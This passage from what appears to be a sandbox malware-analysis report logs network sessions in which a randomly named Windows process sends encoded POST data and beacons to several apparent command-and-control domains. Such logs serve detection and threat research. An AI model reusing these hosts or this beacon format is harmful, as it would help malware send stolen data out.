                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Content-Encoding: gzip


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    14 | 192.168.2.8 | 49727 | 156.234.28.101 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Dec 3, 2024 14:16:57.568144083 CET | 831 | OUT | POST /dp9c/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.btblxhh.top
                                                                                                    Origin: http://www.btblxhh.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 227
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.btblxhh.top/dp9c/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=SK8iALUXp2haKPh5u8ksiEcUGJmkcXHGTTgkjDL28ABTjy3MHf5dlmAHaWEllMjqVLHvvl4ZtJLBdFC4dp6cJ2LQDQY7KvLQXlenccaFFdl+Q3TQZSx9IFBkVvMJYe4V4KfID53CqApqj7dg49BmTzicln5azB/VuOAt0cpG1sC/C16SnqLAX8E8xZbQbXvCeVTXxLSXRtmIB9sYwkxLgI7UV/36
                                                                                                    Dec 3, 2024 14:16:59.136734009 CET | 1135 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Content-Encoding: gzip


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    15 | 192.168.2.8 | 49728 | 156.234.28.101 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Dec 3, 2024 14:17:00.226274014 CET | 1848 | OUT | POST /dp9c/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.btblxhh.top
                                                                                                    Origin: http://www.btblxhh.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 1243
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.btblxhh.top/dp9c/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:17:01.784885883 CET | 1135 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:17:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Content-Encoding: gzip


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    16  192.168.2.8  49729  156.234.28.101  80  5268  C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Dec 3, 2024 14:17:02.890991926 CET  560  OUT  GET /dp9c/?1JgHkl=fIUCD8Yz2nphKcMxyO4tlSIcMJ/+EEeHC1g1rmDhwR9J1RiwCtlWpXo9Zxpli6GkENLWknkKup+McE28ApWDIV/QPDMFPo3/M02rRc2bBu1CVBDCQC56E21kZNcAcsBmiQ==&uZ9=wvL0WTq0tnld4P HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.btblxhh.top
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:17:04.451384068 CET  1236  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:17:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Set-Cookie: _sessionsid=OTE2YzNjMjUwYmRjYjM5ODAwMzY0NTY3ZjQwMThkNjE=; path=/; expires=Tue, 10 Dec 2024 13:17:04 GMT
                                                                                                    Data Ascii: 71d<!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><title>&#84;&#67;&#71;&#24425;&#31080;&#23448;&#32593;&#45;&#65;&#80;&#80;&#19979;&#36733;</title><meta name="keywords" content="&#84;&#67;&#71;&#24425;&#31080;&#23448;&#32593;&#45;&#65;&#80;&#80;&#19979;&#36733;"/><meta name="description" content="&#9917;&#65039;&#9917;&#65039;&#9917;&#65039;&#84;&#67;&#71;&#24425;&#31080;&#65;&#80;&#80;&#55356;&#57144;&#121;&#107;&#49;&#56;&#56;&#46;&#99;&#99;&#9989;&#39030;&#32423;&#19979;&#27880;&#24179;&#21488;&#44;&#25552;&#20379;&#84;&#67;&#71;&#24425;&#31080;&#32593;&#31449;&#44;&#84;&#67;&#71;&#24425;&#31080;&#26368;&#26032;&#23448;&#32593;&#44;&#84;&#67;&#71;&#24425;&#31080;&#97;&#112;&#112;&#19979;&#36733;&#44;&#21508;&#31181;&#23089;&#20048;&#21697;&#31181;&#24212;&#26377;&#23613;&#26377;&#44
                                                                                                    Dec 3, 2024 14:17:04.451414108 CET  895  IN
                                                                                                    Data Ascii: ;&#84;&#67;&#71;&#24425;&#31080;&#32593;&#31449;&#23448;&#26041;&#23458;&#26381;&#50;&#52;&#23567;&#26102;&#22312;&#32447;&#20026;&#24744;&#26381;&#21153;&#33;"/><script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){docu


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    17  192.168.2.8  49730  209.74.79.42  80  5268  C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Dec 3, 2024 14:17:10.043855906 CET  820  OUT  POST /b8eq/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.primespot.live
                                                                                                    Origin: http://www.primespot.live
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 207
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.primespot.live/b8eq/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=tAmYdxGeOSTwWFU8gZt9A1rRM9aw4+bu8IieumxDd/D18AU2Vl8CKj0vhbqBYxesi8IVwFnF9ehjfq9tfuSBPBwVLogQeEXwkVrdrn5GAlWOHvBII5yXuOh3sCtWEyEVd7X4PcofRSe2M0Rw51oCrsiSdlLVRFe1zV4rR45zfU8Ff6AN4sznWVthdJCGeNcrInkO9qU=
                                                                                                    Dec 3, 2024 14:17:11.301911116 CET  533  IN  HTTP/1.1 404 Not Found
                                                                                                    Date: Tue, 03 Dec 2024 13:17:11 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 389
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    18  192.168.2.8  49731  209.74.79.42  80  5268  C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Dec 3, 2024 14:17:12.707151890 CET  840  OUT  POST /b8eq/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.primespot.live
                                                                                                    Origin: http://www.primespot.live
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 227
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.primespot.live/b8eq/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=tAmYdxGeOSTwUlE8i+59HVreQNawtOb18Ieeun1pcMr19ic2EXUCLj0vp7qEcxeri8FqwELF9e1jfv5tf/SCORwXEIgeA0XwkVrdrjorAlOObPxIJYyQx+h04StWPSERd7WvPdkxRRq2Mxtw+koBgsicZlKyCG67plYwNrRnQE0qaMxniO7hVVFKdKqwb6BDSE0+j9BJjz9z2DaU0++r+/iNx8l1
                                                                                                    Dec 3, 2024 14:17:13.915189028 CET  533  IN  HTTP/1.1 404 Not Found
                                                                                                    Date: Tue, 03 Dec 2024 13:17:13 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 389
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    19  192.168.2.8  49732  209.74.79.42  80  5268  C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Dec 3, 2024 14:17:15.372607946 CET  1857  OUT  POST /b8eq/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.primespot.live
                                                                                                    Origin: http://www.primespot.live
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 1243
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.primespot.live/b8eq/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:17:16.649714947 CET  533  IN  HTTP/1.1 404 Not Found
                                                                                                    Date: Tue, 03 Dec 2024 13:17:16 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 389
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    20  192.168.2.8  49733  209.74.79.42  80  5268  C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Dec 3, 2024 14:17:18.174067020 CET  563  OUT  GET /b8eq/?1JgHkl=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxDBcOFJwWRQ35vHrygTRMD3WsSY1KHoe5ieZg+FRRJHZJBA==&uZ9=wvL0WTq0tnld4P HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.primespot.live
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:17:19.300564051 CET  548  IN  HTTP/1.1 404 Not Found
                                                                                                    Date: Tue, 03 Dec 2024 13:17:19 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 389
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    21  192.168.2.8  49734  208.91.197.27  80  5268  C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Dec 3, 2024 14:17:25.121068954 CET  838  OUT  POST /e1ut/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.mohawktooldie.online
                                                                                                    Origin: http://www.mohawktooldie.online
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 207
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.mohawktooldie.online/e1ut/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=SE7tgT2n9rTnuLLu18Ey+GTf19wAG3J1ZX9XgaDnH+iGb9kYafnbYHIBysOySGnAFBceHirdYIEA8vhZpqa0lb4MMWDlva6FYjdXO8dhnvP07GAM5zVsjGzNkhcmhdipUy6Ry7X9DTbeljDOwJqG4dMYtwlGNwTIfPcFGMhp2OaWd4cll0I3hqac0YbM2tcDF54QLts=


                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                     22 | 192.168.2.8 | 49735 | 208.91.197.27 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                     Dec 3, 2024 14:17:27.787919998 CET | 858 | OUT | POST /e1ut/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.mohawktooldie.online
                                                                                                    Origin: http://www.mohawktooldie.online
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 227
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.mohawktooldie.online/e1ut/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=SE7tgT2n9rTnuoDuyaMyp2TYw9wAU3JxZXhXgb3JGIaGbfsYbenbbHIB5MO3WGnLFBYsHgvdYIgA8qFZod27mr4KA2D7h66FYjdXO8Jfnvn072wM/R9viGzMtBcmlditUy6vy6KYDVHelizOzYqB3dMewAlUGhqMGIMMbLcMq8OFYOtP/WAxiqy30bz6zaBrfaogV66TDz02gBz9q/103R6PPugj


                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                     23 | 192.168.2.8 | 49736 | 208.91.197.27 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                     Dec 3, 2024 14:17:30.443095922 CET | 1875 | OUT | POST /e1ut/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.mohawktooldie.online
                                                                                                    Origin: http://www.mohawktooldie.online
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 1243
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.mohawktooldie.online/e1ut/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36


                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                     24 | 192.168.2.8 | 49737 | 208.91.197.27 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                     Dec 3, 2024 14:17:33.093357086 CET | 569 | OUT | GET /e1ut/?uZ9=wvL0WTq0tnld4P&1JgHkl=fGTNjk6zk5H6mZem55oD5grLw/UWVVRjfCwqsuvIEvy1a98DW/HAQiAN9onJYw2/Zx4HIDjcQpN8hNtj+4iq978UInban7m5bgNeGe1Bvvfx4xUX/Ch8llqthzcuqNnDWQ== HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.mohawktooldie.online
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                     Dec 3, 2024 14:17:34.812501907 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                    Date: Tue, 03 Dec 2024 13:17:34 GMT
                                                                                                    Server: Apache
                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                    Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                    Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                    Set-Cookie: vsid=906vr48077745424966332; expires=Sun, 02-Dec-2029 13:17:34 GMT; Max-Age=157680000; path=/; domain=www.mohawktooldie.online; HttpOnly
                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_SH/AVE9rAOJDQLdU3HQ1C3tPp+gaMYO14hodDs3qiBwzxkzW2oPM6sNlVvjoGk5BVhxZ+CcOsuyg2QO6s8aVtQ==
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Connection: close
                                                                                                    Data Ascii: bb0a<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.n


                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                     25 | 192.168.2.8 | 49738 | 185.101.158.113 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                     Dec 3, 2024 14:17:40.878516912 CET | 823 | OUT | POST /y54z/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.graviton.energy
                                                                                                    Origin: http://www.graviton.energy
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 207
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.graviton.energy/y54z/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=lo7alo5mc8LPl99c9GVD/rOqszxIh1ESvF3kTx3KnGIeQy5cfMf5ZV+lR+rlHCJtSy4kr/CIeOdHwCB0wGNXVOdmvG+A0z3dCPYDZm1lrDmvNsGYjkXyfo23vHKzvU0iTnF9hpphrBccDySSe54p1JE7iRpd7l4H+Ks3ub9g4UpLqBM91c+ngMOJptTHhENayINTQAA=
                                                                                                     Dec 3, 2024 14:17:42.175770044 CET | 1150 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cache-Control: no-cache, private
                                                                                                    Date: Tue, 03 Dec 2024 13:17:41 GMT
                                                                                                    Content-Encoding: gzip


                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                     26 | 192.168.2.8 | 49739 | 185.101.158.113 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                     Dec 3, 2024 14:17:43.540066004 CET | 843 | OUT | POST /y54z/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.graviton.energy
                                                                                                    Origin: http://www.graviton.energy
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 227
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.graviton.energy/y54z/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=lo7alo5mc8LP/dNc8nVD5LOpvzxIrVEWvFzkTzHanQweQTJceJj5eV+laeqvIiJySyEar9WIeOJHwHl0x1VWUedokm+Cpj3dCPYDZlJfrCOvNdWYgFXtB42o43KzrU1pTnFDhoFHrHYcDziSesMq7JE5txpLyXhP+9sbzoRi73pYmX9Xv+2hjMmipu7xkzQyordjOXV1I829cQDCsFY8/JCPRviq
                                                                                                     Dec 3, 2024 14:17:44.847474098 CET | 1150 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cache-Control: no-cache, private
                                                                                                    Date: Tue, 03 Dec 2024 13:17:44 GMT
                                                                                                    Content-Encoding: gzip


Session ID:27
Source IP:192.168.2.8
Source Port:49740
Destination IP:185.101.158.113
Destination Port:80
PID:5268
Process:C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe

Timestamp:Dec 3, 2024 14:17:46.210248947 CET
Bytes transferred:1860
Direction:OUT
Data:
POST /y54z/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.graviton.energy
                                                                                                    Origin: http://www.graviton.energy
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 1243
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.graviton.energy/y54z/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36

Timestamp:Dec 3, 2024 14:17:47.540468931 CET
Bytes transferred:1150
Direction:IN
Data:
HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cache-Control: no-cache, private
                                                                                                    Date: Tue, 03 Dec 2024 13:17:47 GMT
                                                                                                    Content-Encoding: gzip


Session ID:28
Source IP:192.168.2.8
Source Port:49741
Destination IP:185.101.158.113
Destination Port:80
PID:5268
Process:C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe

Timestamp:Dec 3, 2024 14:17:48.864129066 CET
Bytes transferred:564
Direction:OUT
Data:
